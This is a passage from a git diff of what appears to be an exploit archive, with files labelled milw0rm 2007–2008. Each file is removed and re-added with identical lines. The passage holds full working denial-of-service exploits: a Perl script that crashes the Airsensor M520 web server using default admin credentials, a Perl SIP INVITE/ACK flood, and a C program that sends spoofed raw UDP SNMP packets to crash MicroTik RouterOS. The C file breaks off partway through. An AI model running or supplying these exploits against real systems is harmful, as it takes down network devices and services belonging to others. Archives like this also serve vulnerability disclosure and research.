HTTPS request (necessary authentication), -# which will cause the HTTPS service on the system to crash. -# -# Requisites: "Use DHCP" option interface mark "No" -# -# Examples: -# -# GET https://192.168.100.100/adLog.cgi?%41%41%41 HTTP/1.1 -# GET https://192.168.100.100/post.cgi?%41%41%41 HTTP/1.1 -# GET https://192.168.100.100/ad.cgi?%41%41%41 HTTP/1.1 -# -# Pinging: -# -# Before: -# -# Reply from 192.168.100.100: bytes=32 time<1ms TTL=64 -# Reply from 192.168.100.100: bytes=32 time<1ms TTL=64 -# Reply from 192.168.100.100: bytes=32 time<1ms TTL=64 -# -# After: -# -# Hardware error. -# Hardware error. -# Hardware error. -# Request timed out. -# Request timed out. -# Request timed out. -# -# C:\>nc -vvn 192.168.100.100 443 -# (UNKNOWN) [192.168.100.100] 443 (?): connection refused -# sent 0, rcvd 0: NOTSOCK -# -# Buffer Overflow debug log: -# -# 1970-01-01 00:00:15 SYS-INFO:: AirDefense Firmware Version 4.4.1.4, Model = M520 -# 1970-01-01 00:00:15 SYS-CRIT:: SENSOR EXCEPTION ERROR -# 1970-01-01 00:00:15 SYS-CRIT:: SENSOR VERSION NUMBER: 4.4.1.4 -# 1970-01-01 00:00:15 SYS-CRIT:: SENSOR Up Time: 00:08:51 -# 1970-01-01 00:00:15 SYS-CRIT:: Time of Exception: 1970-01-01 00:08:55 -# 1970-01-01 00:00:15 SYS-CRIT:: Exception ID = 10 ( Reserved Instruction) -# 1970-01-01 00:00:15 SYS-CRIT:: Thread = HTTPD -# 1970-01-01 00:00:15 SYS-CRIT:: MIPS Register Dump: -# 1970-01-01 00:00:15 SYS-CRIT:: zero=0x00000000 at=0xfffffffe v0=0x00000000 v1=0x00000000 -# 1970-01-01 00:00:16 SYS-CRIT:: a0=0x00000000 a1=0x3d000000 a2=0x00000010 a3=0x00000041 -# 1970-01-01 00:00:16 SYS-CRIT:: t0=0x00000000 t1=0x0000003d t2=0x0000000b t3=0x00000000 -# 1970-01-01 00:00:16 SYS-CRIT:: t4=0x802f799c t5=0xf43dd40f t6=0x0066a1a4 t7=0x4df0e494 -# 1970-01-01 00:00:16 SYS-CRIT:: s0=0x802f7dbf s1=0x0000001f s2=0x802f7910 s3=0x80120000 -# 1970-01-01 00:00:16 SYS-CRIT:: s4=0x80120000 s5=0x80986c30 s6=0x80120000 s7=0x80128afc -# 1970-01-01 00:00:16 SYS-CRIT:: t8=0x480ec8cd t9=0x742b7136 k0=0x802f78c8 k1=0x802f7910 -# 1970-01-01 00:00:16 SYS-CRIT:: gp=0x8015b070 sp=0x802f7910 fp=0x80128aec ra=0x800b2534 -# 1970-01-01 00:00:16 SYS-CRIT:: Address of instruction that caused exception = 0x800b2534 -# 1970-01-01 00:00:16 SYS-CRIT:: Memory address at which adress exception occured = 0x00000000 -# 1970-01-01 00:00:16 SYS-CRIT:: Return address = 0x800b2534 -# 1970-01-01 00:00:17 SYS-CRIT:: Status Reg = 0x1000af03 -# 1970-01-01 00:00:17 SYS-CRIT:: Cache Reg = 0x00000000 -# 1970-01-01 00:00:17 SYS-CRIT:: Cause Reg = 0x30000028 -# 1970-01-01 00:00:17 SYS-CRIT:: Config Reg = 0x03fffbfb -# 1970-01-01 00:00:17 SYS-CRIT:: Vector = 40 -# 1970-01-01 00:00:17 SYS-CRIT:: Processor Version = 0x00018009 -# 1970-01-01 00:00:17 SYS-CRIT:: Stack Trace Begin: "->" = return address -# 1970-01-01 00:00:17 SYS-CRIT:: [802f7910]=0x802f7dbf -# 1970-01-01 00:00:17 SYS-CRIT:: [802f7914]=0x00000000 -# 1970-01-01 00:00:17 SYS-CRIT:: [802f7918]=0x00000000 -# 1970-01-01 00:00:19 SYS-CRIT:: [802f7990]=0x80130000 -# 1970-01-01 00:00:19 SYS-CRIT:: [802f7994]=0x802f7db4 -# 1970-01-01 00:00:19 SYS-CRIT:: [802f7998]=0x80152e18 -# 1970-01-01 00:00:19 SYS-CRIT:: [802f799c]=0x80152ed8 -# 1970-01-01 00:00:19 SYS-CRIT:: [802f79a0]=0x802f7dbf -# 1970-01-01 00:00:19 SYS-CRIT:: [802f79a4]=0x80986c30 -# 1970-01-01 00:00:19 SYS-CRIT:: [802f79a8]=0x802f8200 -# 1970-01-01 00:00:19 SYS-CRIT:: ->[802f79ac]=0x800f0450 <- return address -# 1970-01-01 00:00:19 SYS-CRIT:: [802f79b0]=0x0d0a0074 -# 1970-01-01 00:00:21 SYS-CRIT:: Stack Trace End: -# -# The vulnerability has been reported in versions Airdefense -# -# Firmware Version 4.3.1.1, Model = M520 -# Firmware version 4.4.1.4, Model = M520 -# -# More information: http://www.airdefense.net -# http://support.airdefense.net -# -# Very special credits: str0ke, Kf, rathaous, !dsr, 0dd. -# -# and friends: nitr0us, crypkey, dex, xdawn, sirdarckcat, kuza55, -# pikah, codebreak, h3llfyr3 -# -# Alex Hernandez ahernandez [at] sybsecurity dot com -# - -use strict; -use LWP; -use Data::Dumper; -require HTTP::Request; -require HTTP::Headers; - -my $string = "%41%41%41"; # Strings to send -my $method = 'GET'; # Method "GET" or "POST" -my $uri = 'https://192.168.100.100'; # Factory default IP address -my $content = "/adLog.cgi?"; # Cgi's file to crash - -#my $content = "/ad.cgi?"; -#my $content = "/post.cgi?"; -#my $content = "/logout.cgi?"; - -my $headers = HTTP::Headers->new( - -'Host:' => '192.168.100.100', -'User-Agent:' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6', -'Accept:' => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5', -'Accept-Language:' => 'en-us,en;q=0.5', -'Accept-Charset:' => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7', -'Keep-Alive:' => '300', -'Connection:' => 'keep-alive', -'Referer:' => 'https://192.168.100.100/adLog.cgi?submitButton=refresh&refresh=Refresh', -'Authorization:' => 'Basic YWRtaW46YWlyc2Vuc29y', # base64 encode admin:airsensor - -); - -my $request = HTTP::Request->new($method, $uri, $headers, $content, $string); - -my $ua = LWP::UserAgent->new; -my $response = $ua->request($request); - -print "[+] Denial of Service exploit for Airsensor M520 Final\n"; -print "[+] Coded by: Alex Hernandez [ahernandez\@sybsecurity.com]\n"; -print "[+] We got this response from sensor: \n\n" . $response->content . "\n"; - -my $data; - foreach my $pair (split('&', $response->content)) { - my ($k, $v) = split('=', $pair); - $data->{$k} = $v; -} - -if ($data->{RESULT} != 0) { - - print "[+] Denial of Service exploit for Airsensor M520 Final\n"; - print "[+] Coded by: Alex Hernandez[ahernandez\@sybsecurity.com]\n"; - print "[+] Use:\n"; - print "\tperl -x dos_sensor.pl\n"; - print $data->{RESPMSG} . "\n"; - exit(0); - -} else { - - print "[+] Denial of service Exploit successed!!!\n"; - print "[+] By Alex Hernandez[ahernandez\@sybsecurity.com]\n"; -} - -# milw0rm.com [2007-09-18] +#!/usr/bin/perl -w +# +# Airsensor M520 HTTPD Remote Preauth Denial Of Service and Buffer Overflow PoC +# +# The vulnerability is caused due to an unspecified error in the cgis +# files filter used for configure propierties. This can be exploited by +# sending a specially crafted HTTPS request (necessary authentication), +# which will cause the HTTPS service on the system to crash. +# +# Requisites: "Use DHCP" option interface mark "No" +# +# Examples: +# +# GET https://192.168.100.100/adLog.cgi?%41%41%41 HTTP/1.1 +# GET https://192.168.100.100/post.cgi?%41%41%41 HTTP/1.1 +# GET https://192.168.100.100/ad.cgi?%41%41%41 HTTP/1.1 +# +# Pinging: +# +# Before: +# +# Reply from 192.168.100.100: bytes=32 time<1ms TTL=64 +# Reply from 192.168.100.100: bytes=32 time<1ms TTL=64 +# Reply from 192.168.100.100: bytes=32 time<1ms TTL=64 +# +# After: +# +# Hardware error. +# Hardware error. +# Hardware error. +# Request timed out. +# Request timed out. +# Request timed out. +# +# C:\>nc -vvn 192.168.100.100 443 +# (UNKNOWN) [192.168.100.100] 443 (?): connection refused +# sent 0, rcvd 0: NOTSOCK +# +# Buffer Overflow debug log: +# +# 1970-01-01 00:00:15 SYS-INFO:: AirDefense Firmware Version 4.4.1.4, Model = M520 +# 1970-01-01 00:00:15 SYS-CRIT:: SENSOR EXCEPTION ERROR +# 1970-01-01 00:00:15 SYS-CRIT:: SENSOR VERSION NUMBER: 4.4.1.4 +# 1970-01-01 00:00:15 SYS-CRIT:: SENSOR Up Time: 00:08:51 +# 1970-01-01 00:00:15 SYS-CRIT:: Time of Exception: 1970-01-01 00:08:55 +# 1970-01-01 00:00:15 SYS-CRIT:: Exception ID = 10 ( Reserved Instruction) +# 1970-01-01 00:00:15 SYS-CRIT:: Thread = HTTPD +# 1970-01-01 00:00:15 SYS-CRIT:: MIPS Register Dump: +# 1970-01-01 00:00:15 SYS-CRIT:: zero=0x00000000 at=0xfffffffe v0=0x00000000 v1=0x00000000 +# 1970-01-01 00:00:16 SYS-CRIT:: a0=0x00000000 a1=0x3d000000 a2=0x00000010 a3=0x00000041 +# 1970-01-01 00:00:16 SYS-CRIT:: t0=0x00000000 t1=0x0000003d t2=0x0000000b t3=0x00000000 +# 1970-01-01 00:00:16 SYS-CRIT:: t4=0x802f799c t5=0xf43dd40f t6=0x0066a1a4 t7=0x4df0e494 +# 1970-01-01 00:00:16 SYS-CRIT:: s0=0x802f7dbf s1=0x0000001f s2=0x802f7910 s3=0x80120000 +# 1970-01-01 00:00:16 SYS-CRIT:: s4=0x80120000 s5=0x80986c30 s6=0x80120000 s7=0x80128afc +# 1970-01-01 00:00:16 SYS-CRIT:: t8=0x480ec8cd t9=0x742b7136 k0=0x802f78c8 k1=0x802f7910 +# 1970-01-01 00:00:16 SYS-CRIT:: gp=0x8015b070 sp=0x802f7910 fp=0x80128aec ra=0x800b2534 +# 1970-01-01 00:00:16 SYS-CRIT:: Address of instruction that caused exception = 0x800b2534 +# 1970-01-01 00:00:16 SYS-CRIT:: Memory address at which adress exception occured = 0x00000000 +# 1970-01-01 00:00:16 SYS-CRIT:: Return address = 0x800b2534 +# 1970-01-01 00:00:17 SYS-CRIT:: Status Reg = 0x1000af03 +# 1970-01-01 00:00:17 SYS-CRIT:: Cache Reg = 0x00000000 +# 1970-01-01 00:00:17 SYS-CRIT:: Cause Reg = 0x30000028 +# 1970-01-01 00:00:17 SYS-CRIT:: Config Reg = 0x03fffbfb +# 1970-01-01 00:00:17 SYS-CRIT:: Vector = 40 +# 1970-01-01 00:00:17 SYS-CRIT:: Processor Version = 0x00018009 +# 1970-01-01 00:00:17 SYS-CRIT:: Stack Trace Begin: "->" = return address +# 1970-01-01 00:00:17 SYS-CRIT:: [802f7910]=0x802f7dbf +# 1970-01-01 00:00:17 SYS-CRIT:: [802f7914]=0x00000000 +# 1970-01-01 00:00:17 SYS-CRIT:: [802f7918]=0x00000000 +# 1970-01-01 00:00:19 SYS-CRIT:: [802f7990]=0x80130000 +# 1970-01-01 00:00:19 SYS-CRIT:: [802f7994]=0x802f7db4 +# 1970-01-01 00:00:19 SYS-CRIT:: [802f7998]=0x80152e18 +# 1970-01-01 00:00:19 SYS-CRIT:: [802f799c]=0x80152ed8 +# 1970-01-01 00:00:19 SYS-CRIT:: [802f79a0]=0x802f7dbf +# 1970-01-01 00:00:19 SYS-CRIT:: [802f79a4]=0x80986c30 +# 1970-01-01 00:00:19 SYS-CRIT:: [802f79a8]=0x802f8200 +# 1970-01-01 00:00:19 SYS-CRIT:: ->[802f79ac]=0x800f0450 <- return address +# 1970-01-01 00:00:19 SYS-CRIT:: [802f79b0]=0x0d0a0074 +# 1970-01-01 00:00:21 SYS-CRIT:: Stack Trace End: +# +# The vulnerability has been reported in versions Airdefense +# +# Firmware Version 4.3.1.1, Model = M520 +# Firmware version 4.4.1.4, Model = M520 +# +# More information: http://www.airdefense.net +# http://support.airdefense.net +# +# Very special credits: str0ke, Kf, rathaous, !dsr, 0dd. +# +# and friends: nitr0us, crypkey, dex, xdawn, sirdarckcat, kuza55, +# pikah, codebreak, h3llfyr3 +# +# Alex Hernandez ahernandez [at] sybsecurity dot com +# + +use strict; +use LWP; +use Data::Dumper; +require HTTP::Request; +require HTTP::Headers; + +my $string = "%41%41%41"; # Strings to send +my $method = 'GET'; # Method "GET" or "POST" +my $uri = 'https://192.168.100.100'; # Factory default IP address +my $content = "/adLog.cgi?"; # Cgi's file to crash + +#my $content = "/ad.cgi?"; +#my $content = "/post.cgi?"; +#my $content = "/logout.cgi?"; + +my $headers = HTTP::Headers->new( + +'Host:' => '192.168.100.100', +'User-Agent:' => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6', +'Accept:' => 'text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5', +'Accept-Language:' => 'en-us,en;q=0.5', +'Accept-Charset:' => 'ISO-8859-1,utf-8;q=0.7,*;q=0.7', +'Keep-Alive:' => '300', +'Connection:' => 'keep-alive', +'Referer:' => 'https://192.168.100.100/adLog.cgi?submitButton=refresh&refresh=Refresh', +'Authorization:' => 'Basic YWRtaW46YWlyc2Vuc29y', # base64 encode admin:airsensor + +); + +my $request = HTTP::Request->new($method, $uri, $headers, $content, $string); + +my $ua = LWP::UserAgent->new; +my $response = $ua->request($request); + +print "[+] Denial of Service exploit for Airsensor M520 Final\n"; +print "[+] Coded by: Alex Hernandez [ahernandez\@sybsecurity.com]\n"; +print "[+] We got this response from sensor: \n\n" . $response->content . "\n"; + +my $data; + foreach my $pair (split('&', $response->content)) { + my ($k, $v) = split('=', $pair); + $data->{$k} = $v; +} + +if ($data->{RESULT} != 0) { + + print "[+] Denial of Service exploit for Airsensor M520 Final\n"; + print "[+] Coded by: Alex Hernandez[ahernandez\@sybsecurity.com]\n"; + print "[+] Use:\n"; + print "\tperl -x dos_sensor.pl\n"; + print $data->{RESPMSG} . "\n"; + exit(0); + +} else { + + print "[+] Denial of service Exploit successed!!!\n"; + print "[+] By Alex Hernandez[ahernandez\@sybsecurity.com]\n"; +} + +# milw0rm.com [2007-09-18] diff --git a/platforms/hardware/dos/4692.pl b/platforms/hardware/dos/4692.pl index 4e460a7d5..c93337fc1 100755 --- a/platforms/hardware/dos/4692.pl +++ b/platforms/hardware/dos/4692.pl @@ -1,89 +1,89 @@ -#!/usr/bin/perl - - -############################### -# Vulnerabily discovered using KiF ~ Kiph -# -# Authors: -# Humberto J. Abdelnur (Ph.D Student) -# Radu State (Ph.D) -# Olivier Festor (Ph.D) -# -# Madynes Team, LORIA - INRIA Lorraine -# http://madynes.loria.fr -############################### -use IO::Socket::INET; -use String::Random; -die "Usage $0 " -unless ($ARGV[3]); -$targetUser = $ARGV[1]; -$targetIP = $ARGV[0]; -$attackerUser = $ARGV[3]; -$attackerIP= $ARGV[2]; -$socket=new IO::Socket::INET->new( -Proto=>'udp', -PeerPort=>5060, -PeerAddr=>$targetIP, -LocalPort=>5060); -$foo = new String::Random; -$flag = 0; -@calls; -$threads = 0; -while ($flag == 0){ -$callid= " " . $foo->randpattern("CCCnccnC") ."\@$attackerIP"; -$cseq = $foo->randregex('\d\d\d\d'); -$msg = "INVITE sip:$targetIP SIP/2.0\r -Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r -From: ;tag=1\r -To: \r -Call-ID:$callid\r -CSeq: $cseq INVITE\r -Max-Forwards: 70\r -Contact: \r -Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY, -MESSAGE\r -Content-Length: 0\r -\r -"; -$socket->send($msg); -$socket->recv($text,1024,0); -if ($text =~ /^SIP\/2.0 100(.\r\n)*/ ){ -push(@calls, $callid); -sleep(1); -}elsif ($text =~ /^SIP\/2.0 486(.\r\n)*/ ){ -if ($thread == 0){ -$thread = scalar(@calls); -} -while (scalar(@calls) ge $thread){ -$toTag = $cseq= $callid= $text; -$toTag =~ s/^(.*\r\n)*(To|t):(.*?>)(;.*?)?\r\n(.*\r\n)*/\4/; - -$callid =~ s/^(.*\r\n)*Call-ID:(.*)\r\n(.*\r\n)*/\2/; -$cseq =~ s/^(.*\r\n)*CSeq: (.*?) (.*?)\r\n(.*\r\n)*/\2/; -$msg = "ACK sip:$targetIP SIP/2.0\r -Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r -From: ;tag=1\r -To: $toTag\r -Call-ID:$callid\r -CSeq: $cseq ACK\r -Contact: \r -Content-Length: 0\r -\r -"; -$socket->send($msg); -$i= 0; -while ($i < scalar(@calls)){ -if (@calls[$i] eq $callid){ -delete @calls[$i]; -}else{ -$i += 1; -} -} -if (scalar(@calls) ge $thread){ -$socket->recv($text,1024,0); -} -} -} -} - -# milw0rm.com [2007-12-05] +#!/usr/bin/perl + + +############################### +# Vulnerabily discovered using KiF ~ Kiph +# +# Authors: +# Humberto J. Abdelnur (Ph.D Student) +# Radu State (Ph.D) +# Olivier Festor (Ph.D) +# +# Madynes Team, LORIA - INRIA Lorraine +# http://madynes.loria.fr +############################### +use IO::Socket::INET; +use String::Random; +die "Usage $0 " +unless ($ARGV[3]); +$targetUser = $ARGV[1]; +$targetIP = $ARGV[0]; +$attackerUser = $ARGV[3]; +$attackerIP= $ARGV[2]; +$socket=new IO::Socket::INET->new( +Proto=>'udp', +PeerPort=>5060, +PeerAddr=>$targetIP, +LocalPort=>5060); +$foo = new String::Random; +$flag = 0; +@calls; +$threads = 0; +while ($flag == 0){ +$callid= " " . $foo->randpattern("CCCnccnC") ."\@$attackerIP"; +$cseq = $foo->randregex('\d\d\d\d'); +$msg = "INVITE sip:$targetIP SIP/2.0\r +Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r +From: ;tag=1\r +To: \r +Call-ID:$callid\r +CSeq: $cseq INVITE\r +Max-Forwards: 70\r +Contact: \r +Allow: INVITE, ACK, CANCEL, BYE, OPTIONS, REFER, SUBSCRIBE, NOTIFY, +MESSAGE\r +Content-Length: 0\r +\r +"; +$socket->send($msg); +$socket->recv($text,1024,0); +if ($text =~ /^SIP\/2.0 100(.\r\n)*/ ){ +push(@calls, $callid); +sleep(1); +}elsif ($text =~ /^SIP\/2.0 486(.\r\n)*/ ){ +if ($thread == 0){ +$thread = scalar(@calls); +} +while (scalar(@calls) ge $thread){ +$toTag = $cseq= $callid= $text; +$toTag =~ s/^(.*\r\n)*(To|t):(.*?>)(;.*?)?\r\n(.*\r\n)*/\4/; + +$callid =~ s/^(.*\r\n)*Call-ID:(.*)\r\n(.*\r\n)*/\2/; +$cseq =~ s/^(.*\r\n)*CSeq: (.*?) (.*?)\r\n(.*\r\n)*/\2/; +$msg = "ACK sip:$targetIP SIP/2.0\r +Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1\r +From: ;tag=1\r +To: $toTag\r +Call-ID:$callid\r +CSeq: $cseq ACK\r +Contact: \r +Content-Length: 0\r +\r +"; +$socket->send($msg); +$i= 0; +while ($i < scalar(@calls)){ +if (@calls[$i] eq $callid){ +delete @calls[$i]; +}else{ +$i += 1; +} +} +if (scalar(@calls) ge $thread){ +$socket->recv($text,1024,0); +} +} +} +} + +# milw0rm.com [2007-12-05] diff --git a/platforms/hardware/dos/4978.html b/platforms/hardware/dos/4978.html index 462064105..744406da4 100755 --- a/platforms/hardware/dos/4978.html +++ b/platforms/hardware/dos/4978.html @@ -1,34 +1,34 @@ - - - - - - -# milw0rm.com [2008-01-24] + + + + + + +# milw0rm.com [2008-01-24] diff --git a/platforms/hardware/dos/5054.c b/platforms/hardware/dos/5054.c index a822dcd35..5d7c7e527 100755 --- a/platforms/hardware/dos/5054.c +++ b/platforms/hardware/dos/5054.c @@ -1,200 +1,200 @@ -/* -------------------------------------------------------------------------- -* (c) ShadOS 2008 -* _ _ _ _ _ __ _ _ _ -* | || |___| | | |/ /_ _ (_)__ _| |_| |_ ___ -* | __ / -_) | | ' <| ' \| / _` | ' \ _(_-< -* |_||_\___|_|_|_|\_\_||_|_\__, |_||_\__/__/ -* hellknights.void.ru |___/ .0x48k. -* -* -------------------------------------------------------------------------- -* -* MicroTik RouterOS <=3.2 SNMPd snmp-set DoS exploit. Other OSs may be vulnurable (fe. Linux ) -* Don't forget to visit our site and my homepage for new releases: -* http://hellknights.void.ru -* http://shados.freeweb7.com -* Also, you can mail me any bugs or suggestions: -* mailto: shados /at/ mail /dot/ ru -* -* Thanks 2 antichat.ru and all my friends. -* -------------------------------------------------------------------------- -* -* Copyright (C) 89, 90, 91, 1995-2007 Free Software Foundation. -* -* This program is free software; you can redistribute it and/or modify -* it under the terms of the GNU General Public License as published by -* the Free Software Foundation; either version 2, or (at your option) -* any later version. -* -* This program is distributed in the hope that it will be useful, -* but WITHOUT ANY WARRANTY; without even the implied warranty of -* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the -* GNU General Public License for more details. -* -* You should have received a copy of the GNU General Public License -* along with this program; if not, write to the Free Software Foundation, -* Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. -* -* -------------------------------------------------------------------------- -*/ - -#include -#include -#include -#include -#include -#include -#include -#include -#include -#include - -char evilcode[] = { -0x19, 0x02, 0x02, 0x1e, 0x0c, 0x02, 0x01, 0x00, 0x02, 0x01, 0x00, 0x30, 0x0d, 0x30, 0x0b, 0x06, 0x07, 0x01, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x05, 0x00, 0x00 -}; - - -unsigned short in_cksum(addr, len) -u_short *addr; -int len; -{ - register int nleft = len; - register u_short *w = addr; - register int sum = 0; - u_short answer = 0; - - while (nleft > 1) { - sum += *w++; - sum += *w++; - nleft -= 2; - } - if (nleft == 1) { - *(u_char *) (&answer) = *(u_char *) w; - sum += answer; - } - sum = (sum >> 17) + (sum & 0xffff); - sum += (sum >> 17); - answer = -sum; - return (answer); -} - -int sendudp(int sock,unsigned long *saddr, unsigned long *daddr,unsigned int sport,unsigned int dport,char *data, int len) -{ - char *packet; - struct sockaddr_in dstaddr; - struct iphdr *ip; - struct udphdr *udp; - packet = (char *)malloc(sizeof(struct iphdr)+sizeof(struct udphdr)+len); - memset(packet,0,sizeof(struct iphdr) + sizeof(struct udphdr) + len); - if (packet == NULL) { perror("Malloc failed\n"); exit(-1); } - ip = (struct iphdr *)packet; - udp = (struct udphdr *)(packet+sizeof(struct iphdr)); - ip->saddr = *saddr; - ip->daddr = *daddr; - ip->version = 4; - ip->ihl = 5; - ip->ttl = 255; - ip->id = htons((unsigned short) rand()); - ip->protocol = IPPROTO_UDP; - ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr)+len); - ip->check = in_cksum(ip, sizeof(struct iphdr)); - udp->source = htons(sport); - udp->dest = htons(dport); - udp->len = htons(sizeof(struct udphdr) + len); - memcpy(packet+(sizeof(struct iphdr) + sizeof(struct udphdr)),data,len); - dstaddr.sin_family = AF_INET; - dstaddr.sin_addr.s_addr = *daddr; - if (sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct udphdr)+len,0,(struct sockaddr *)&dstaddr,sizeof(struct sockaddr_in)) < 0) - perror("sendto() failed"); - free(packet); -} - -char * makereq(char *community,int *size) -{ - char *buf; - char *ptr; - int len; - int i; - - len = 5 + strlen(community) + sizeof(evilcode); - buf = (char *)malloc(len); - ptr = buf; - - *ptr++ = 0x30; - *ptr++ = len; - - /* Snmp Version */ - *ptr++ = 0x02; - *ptr++ = 0x01; - *ptr++ = 0x00; - - /* Community */ - *ptr++ = 0x04; - *ptr++ = strlen(community); - strcpy(ptr,community); - ptr = ptr + strlen(community); - - - *ptr++ = 0xa3; /* Set Request */ - - memcpy(ptr, evilcode, sizeof(evilcode)); - ptr = ptr + sizeof(evilcode); - - *size = len+2; - return buf; -} - -int erexit(char *msg) -{ - printf("%s\n",msg); - exit (-1) ; -} - -int usage() -{ - printf("Usage: ./snmpdos <-s source> <-d dest> <-c community>\n"); -} - -int main(int argc, char **argv) -{ - char *saddr,*daddr,*community; - unsigned char *buf; - int size; - int sock; - unsigned long lsaddr,ldaddr; - int i; - - saddr = NULL; - daddr = NULL; - if (argc != 7) { usage(); erexit("not enough args\n"); } - - if (!strcmp(argv[1],"-s")) - saddr = strdup(argv[2]); - if (!strcmp(argv[3],"-d")) - daddr = strdup(argv[4]); - if (!strcmp(argv[5],"-c")) - community = strdup(argv[6]); - - printf("Ok, spoofing packets from %s to %s\n",saddr,daddr); - - if (inet_addr(saddr) == -1 || inet_addr(daddr) == -1) - erexit("Invalid source/destination IP address\n"); - - if (saddr == NULL) { usage(); erexit("No Source Address"); } - if (daddr == NULL) { usage(); erexit("No Dest Address"); } - - sock = socket(AF_INET,SOCK_RAW,IPPROTO_RAW); - if (sock == -1) - erexit("Couldnt open Raw socket!(Are you root?)\n"); - - lsaddr = inet_addr(saddr); - ldaddr = inet_addr(daddr); - - buf = makereq(community,&size); - - sendudp(sock,&lsaddr,&ldaddr,32788,161,buf,size); - fprintf(stdout,"Sent packet. SNMPd must be down.\n"); - return 0; - -} - -// milw0rm.com [2008-02-03] +/* -------------------------------------------------------------------------- +* (c) ShadOS 2008 +* _ _ _ _ _ __ _ _ _ +* | || |___| | | |/ /_ _ (_)__ _| |_| |_ ___ +* | __ / -_) | | ' <| ' \| / _` | ' \ _(_-< +* |_||_\___|_|_|_|\_\_||_|_\__, |_||_\__/__/ +* hellknights.void.ru |___/ .0x48k. +* +* -------------------------------------------------------------------------- +* +* MicroTik RouterOS <=3.2 SNMPd snmp-set DoS exploit. Other OSs may be vulnurable (fe. Linux ) +* Don't forget to visit our site and my homepage for new releases: +* http://hellknights.void.ru +* http://shados.freeweb7.com +* Also, you can mail me any bugs or suggestions: +* mailto: shados /at/ mail /dot/ ru +* +* Thanks 2 antichat.ru and all my friends. +* -------------------------------------------------------------------------- +* +* Copyright (C) 89, 90, 91, 1995-2007 Free Software Foundation. +* +* This program is free software; you can redistribute it and/or modify +* it under the terms of the GNU General Public License as published by +* the Free Software Foundation; either version 2, or (at your option) +* any later version. +* +* This program is distributed in the hope that it will be useful, +* but WITHOUT ANY WARRANTY; without even the implied warranty of +* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +* GNU General Public License for more details. +* +* You should have received a copy of the GNU General Public License +* along with this program; if not, write to the Free Software Foundation, +* Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. +* +* -------------------------------------------------------------------------- +*/ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +char evilcode[] = { +0x19, 0x02, 0x02, 0x1e, 0x0c, 0x02, 0x01, 0x00, 0x02, 0x01, 0x00, 0x30, 0x0d, 0x30, 0x0b, 0x06, 0x07, 0x01, 0x00, 0x01, 0x00, 0x01, 0x00, 0x00, 0x05, 0x00, 0x00 +}; + + +unsigned short in_cksum(addr, len) +u_short *addr; +int len; +{ + register int nleft = len; + register u_short *w = addr; + register int sum = 0; + u_short answer = 0; + + while (nleft > 1) { + sum += *w++; + sum += *w++; + nleft -= 2; + } + if (nleft == 1) { + *(u_char *) (&answer) = *(u_char *) w; + sum += answer; + } + sum = (sum >> 17) + (sum & 0xffff); + sum += (sum >> 17); + answer = -sum; + return (answer); +} + +int sendudp(int sock,unsigned long *saddr, unsigned long *daddr,unsigned int sport,unsigned int dport,char *data, int len) +{ + char *packet; + struct sockaddr_in dstaddr; + struct iphdr *ip; + struct udphdr *udp; + packet = (char *)malloc(sizeof(struct iphdr)+sizeof(struct udphdr)+len); + memset(packet,0,sizeof(struct iphdr) + sizeof(struct udphdr) + len); + if (packet == NULL) { perror("Malloc failed\n"); exit(-1); } + ip = (struct iphdr *)packet; + udp = (struct udphdr *)(packet+sizeof(struct iphdr)); + ip->saddr = *saddr; + ip->daddr = *daddr; + ip->version = 4; + ip->ihl = 5; + ip->ttl = 255; + ip->id = htons((unsigned short) rand()); + ip->protocol = IPPROTO_UDP; + ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct udphdr)+len); + ip->check = in_cksum(ip, sizeof(struct iphdr)); + udp->source = htons(sport); + udp->dest = htons(dport); + udp->len = htons(sizeof(struct udphdr) + len); + memcpy(packet+(sizeof(struct iphdr) + sizeof(struct udphdr)),data,len); + dstaddr.sin_family = AF_INET; + dstaddr.sin_addr.s_addr = *daddr; + if (sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct udphdr)+len,0,(struct sockaddr *)&dstaddr,sizeof(struct sockaddr_in)) < 0) + perror("sendto() failed"); + free(packet); +} + +char * makereq(char *community,int *size) +{ + char *buf; + char *ptr; + int len; + int i; + + len = 5 + strlen(community) + sizeof(evilcode); + buf = (char *)malloc(len); + ptr = buf; + + *ptr++ = 0x30; + *ptr++ = len; + + /* Snmp Version */ + *ptr++ = 0x02; + *ptr++ = 0x01; + *ptr++ = 0x00; + + /* Community */ + *ptr++ = 0x04; + *ptr++ = strlen(community); + strcpy(ptr,community); + ptr = ptr + strlen(community); + + + *ptr++ = 0xa3; /* Set Request */ + + memcpy(ptr, evilcode, sizeof(evilcode)); + ptr = ptr + sizeof(evilcode); + + *size = len+2; + return buf; +} + +int erexit(char *msg) +{ + printf("%s\n",msg); + exit (-1) ; +} + +int usage() +{ + printf("Usage: ./snmpdos <-s source> <-d dest> <-c community>\n"); +} + +int main(int argc, char **argv) +{ + char *saddr,*daddr,*community; + unsigned char *buf; + int size; + int sock; + unsigned long lsaddr,ldaddr; + int i; + + saddr = NULL; + daddr = NULL; + if (argc != 7) { usage(); erexit("not enough args\n"); } + + if (!strcmp(argv[1],"-s")) + saddr = strdup(argv[2]); + if (!strcmp(argv[3],"-d")) + daddr = strdup(argv[4]); + if (!strcmp(argv[5],"-c")) + community = strdup(argv[6]); + + printf("Ok, spoofing packets from %s to %s\n",saddr,daddr); + + if (inet_addr(saddr) == -1 